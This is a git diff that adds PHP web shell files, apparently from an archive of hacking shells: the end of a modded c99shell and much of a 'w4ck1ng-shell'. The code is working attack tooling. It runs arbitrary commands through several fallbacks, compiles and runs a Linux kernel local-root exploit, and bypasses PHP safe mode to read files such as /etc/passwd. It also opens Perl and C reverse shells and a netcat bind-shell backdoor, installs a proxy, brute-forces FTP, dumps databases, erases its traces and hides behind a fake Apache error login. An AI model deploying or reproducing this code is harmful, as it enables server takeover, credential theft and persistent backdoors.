+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/wacking.php.php.txt b/xakep-shells/PHP/wacking.php.php.txt
new file mode 100644
index 0000000..d870490
--- /dev/null
+++ b/xakep-shells/PHP/wacking.php.php.txt
@@ -0,0 +1,2830 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+//removed backdoor
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+//$log_email = "synsta@gmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
